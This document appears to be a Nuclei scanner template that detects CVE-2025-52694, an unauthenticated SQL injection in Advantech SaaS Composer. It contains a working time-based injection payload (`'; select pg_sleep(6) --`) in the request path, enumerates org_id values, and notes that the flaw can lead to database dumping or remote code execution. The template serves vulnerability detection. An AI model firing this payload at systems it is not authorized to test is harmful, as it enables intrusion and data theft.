id: CVE-2025-52694

info:
  name: Advantech SaaS Composer - SQL Injection
  author: Loi Nguyen Thang
  severity: Critical
  description: |
    Advantech WISE-IoTSuite/SaaS Composer is vulnerable to an unauthenticated SQL Injection vulnerability.
    The `filename` parameter in the URL path is unsafely concatenated into a PostgreSQL query.
    Attackers can inject stacked queries (e.g., `pg_sleep`) to confirm the vulnerability or potentially achieve Remote Code Execution (RCE) depending on database privileges.
  impact: |
    Successful exploitation could allow an attacker to dump the database, modify data, or execute remote commands on the underlying server.
  remediation: |
    Apply the latest security patches provided by Advantech or sanitize the `filename` input parameter to prevent SQL injection.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2025-52694
    - https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001
    - https://github.com/Winz18/CVE-2025-52694-POC
  classification:
    cve-id: CVE-2025-52694
    cwe-id: CWE-89
  tags: cve, cve2025, sqli, advantech, iot, saas-composer, time-based

http:
  - method: GET
    path:
      # Inject pg_sleep(6) into the filename and fuzz the org_id parameter
      - "{{BaseURL}}/displays/nuclei_check.json'; select pg_sleep(6) --?org_id={{org_id}}"

    payloads:
      # Brute-force org_id from 1 to 5 as the vulnerability depends on a valid organization context
      org_id:
        - 1
        - 2
        - 3
        - 4
        - 5

    # Use clusterbomb to iterate through payloads
    attack: clusterbomb

    # Optimization: Stop scanning as soon as a valid org_id triggers the time delay
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          # Check if the response time is greater than or equal to 6 seconds
          - "duration>=6"